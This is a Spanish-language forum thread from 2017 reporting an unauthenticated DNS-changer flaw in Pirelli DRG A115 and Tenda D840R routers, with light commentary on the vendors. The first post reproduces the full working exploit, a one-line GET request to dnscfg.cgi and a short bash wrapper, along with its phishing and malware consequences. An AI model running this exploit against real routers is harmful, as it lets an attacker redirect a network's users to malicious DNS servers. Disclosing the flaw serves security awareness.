El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 17-01-2017 16:19:25

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,489

Peligrosa brecha "Hacking DNS" en dos ruters de Pirelli y Tenda

Tenda ADSL2/2+ Modem D840R DNS Changer
                     y
    Pirelli DRG A115 ADSL Router DNS Changer
Promoción: ¡2 por 1!

pirelli_DNS_1.jpg

  La celebra firma italiana de neumáticos tiene una sucursal (Pirelli Broadband connexion) que se dedica a la fabricación de puntos de acceso.
Podéis ver aquí la foto del Discus TM DRG A115   

pirelli_DNS_2.png

  Se parece más a una consola  que a un router. big_smile
Supongo que ya conocéis a Tenda. Es un fabricante chino comparable a TP-Link (en versión "menos bien")
   Sus productos no son muy caros; su oferta es amplía pero tienen a unos modelos que son... feos.
No hable del diseño, esto da absolutamente igual, hablo del rendimiento, de las limitaciones... y de brechas de seguridad.
   Cuando se trata de viejo material (y si además los fabricantes no son de los que brindan un buen soporte) la brecha se desvela y se queda allí.
  Conocida y, cómo vamos a ver, muuuuuuuuuy fácil de explotar.
Antes de dar la formula mágica, hay que citar y felicitar su autor: Todor Donev
  Ahora el exploit (resuminedo):

GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

  Es muy simple. Lo primero que hay que decir es que la interfaz de gestión web de ambos modelos  no requiere credenciales.

The vulnerability exist in the web interface, which is  accessible without authentication

¡Empezamos bien! lol
  No hace flata credenciales para  mandar una petición  GET con POST datos. 
El exploit usa dnsdcfg.cgi para re-configurar los parámetros DNS del punto de acceso.
Se pone cómo DNS "primario" la IP empleada por el ataquante. Así se puede llevar un usuario de la red afectada a una pagina falsa (phishing), se puede modificar los anuncios de una pagina, aumenta el riesgo de que se cuela un malware y se puede impedir actualizaciones en sistemas como windows (manteniendo unas brechas de seguridad abiertas)

#    o  Steering unknowing users to bad sites:
#       These sites can be phishing pages that
#       spoof well-known sites in order to
#       trick users into handing out sensitive
#       information.
#
#    o  Replacing ads on legitimate sites:
#       Visiting certain sites can serve users
#       with infected systems a different set
#       of ads from those whose systems are
#       not infected.
#   
#    o  Controlling and redirecting network traffic:
#       Users of infected systems may not be granted
#       access to download important OS and software
#       updates from vendors like Microsoft and from
#       their respective security vendors.
#
#    o  Pushing additional malware:
#       Infected systems are more prone to other
#       malware infections (e.g., FAKEAV infection).
#

  Hablamos de técnicas de Man in the middle (parcial) y la brecha se considera cómo seria.

   Hay dos avisos de seguridad distintos, uno para cada modelo, pero la brecha es exactamente la misma.
Tenéis el mismo exploit, un script bash de algunos lineas, lo único que hace es redactar para vosotros la petición (debéis indicar los DNS a emplear al lanzar le script)
Es esto:

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "               Tenda ADSL2/2+ Modem D840R " 
        echo "           Unauthenticated Remote DNS Change Exploit"
        echo "  ==================================================================="
        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
        echo "  Example: $0 133.7.133.7 8.8.8.8"
        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
        echo ""
        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
        GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

No he visto aún que pinta tiene el Tenda... A ver...

Seleccion_056.png

Otra maravilla... big_smile

Funetes 

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 18-01-2017 05:49:05

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 775

Re: Peligrosa brecha "Hacking DNS" en dos ruters de Pirelli y Tenda

Que se dejan a los pneunomaticos big_smile


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

#3 18-01-2017 10:32:19

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,489

Re: Peligrosa brecha "Hacking DNS" en dos ruters de Pirelli y Tenda

Para hablar un poco de los routers Pirelli: Son routers de bajo coste destinados a las empresas proveedores de Internet para distribución en masa. En Italia (fastweb y Alice por ejemplo) y fuera de Italia.
Se conoce por ejemplo el algoritmo WPA de los Pirelli de Arnet (operadora en argentina)
  Parece que están un poco en la cuerda floja.
  Me parece que Hace tiempo que no han sacado un modelo nuevo y que no tienen nada "para fibra con wifi ac".
  Están un poco fuera de juego.
   Así tendrán más tiempo para dedicar a los neumáticos tongue .

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Hostbase 1.2 está aqui por Koala  [ 1 2 3 4 5 ]
124 7767 Ayer 21:23:03 por kcdtv
3 1018 Ayer 21:15:55 por kcdtv
Pegado:
Pegado:: 2ª Sorteo Del Mercadillo por josep345  [ 1 2 ]
46 1674 Ayer 20:39:09 por josep345
23 4882 Ayer 16:56:55 por javierbu
7 754 19-10-2018 23:58:52 por javierbu

Pie de página

Información del usuario

Ultimo usuario registrado: kyboyx
Usuarios registrados conectados: 1
Invitados conectados: 15

Conectados: Xavi

Estadisticas de los foros

Número total de usuarios registrados: 1,237
Número total de temas: 1,207
Número total de mensajes: 12,440

Máx. usuarios conectados: 71 el 18-10-2018 06:35:48